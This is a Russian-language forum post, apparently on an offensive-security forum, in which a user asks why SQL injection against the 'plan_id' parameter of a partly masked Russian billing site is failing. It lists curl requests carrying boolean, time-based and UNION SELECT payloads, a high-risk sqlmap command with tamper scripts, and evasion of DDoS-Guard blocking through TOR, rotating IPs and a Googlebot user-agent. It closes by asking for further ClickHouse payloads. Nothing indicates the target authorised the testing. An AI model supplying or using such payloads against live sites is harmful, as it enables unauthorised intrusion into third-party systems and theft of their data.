• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Не могу найти уязвимость, хотя инъекции должны работать

cvve

New member
23.12.2024
1
0
BIT
34
curl "https://billing.*****.ru/order.php?plan_id=692%20AND%201=1" → 200 OK
curl "https://billing*****.ru/order.php?plan_id=692%20AND%201=0" → 200 OK (контент не меняется)

curl "https://billing.*****.ru/order.php?plan_id=692%20AND%20sleepEachRow(5)" → Нет задержки

curl "https://billing.*****t.ru/order.php?plan_id=692%20UNION%20SELECT%201,@@version,3,4--" → 200 OK (но данные не отображаются)

пробовал через sqlmap автоматизировать -
sqlmap -u "https://billing.****.ru/order.php?plan_id=692" \
--tamper=charencode,space2comment \
--dbms=ClickHouse \
--level=5 --risk=3 --flush-session
Результат:

[INFO] GET parameter 'plan_id' appears to be dynamic, but no injection found.

Пробовал тамперы (between, randomcase).
Менял User-Agent на Googlebot.
Использовал TOR + рандомные IP.

Ответы сервера:

Всегда возвращает HTTP 200 с одинаковым HTML (<!DOCTYPE HTML>).
Иногда блокирует IP через DDoS-Guard после 5+ запросов.

У меня есть несколько гипотез

Сервер кэширует ответы параметр plan_id не динамичен.

ClickHouse требует нестандартный синтаксис (например, WITH или GLOBAL IN).


Какие неочевидные пейлоады для ClickHouse можно попробовать?

Может ли это быть ложноположительной динамичностью (параметр влияет не на SQL, а на логику приложения)?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!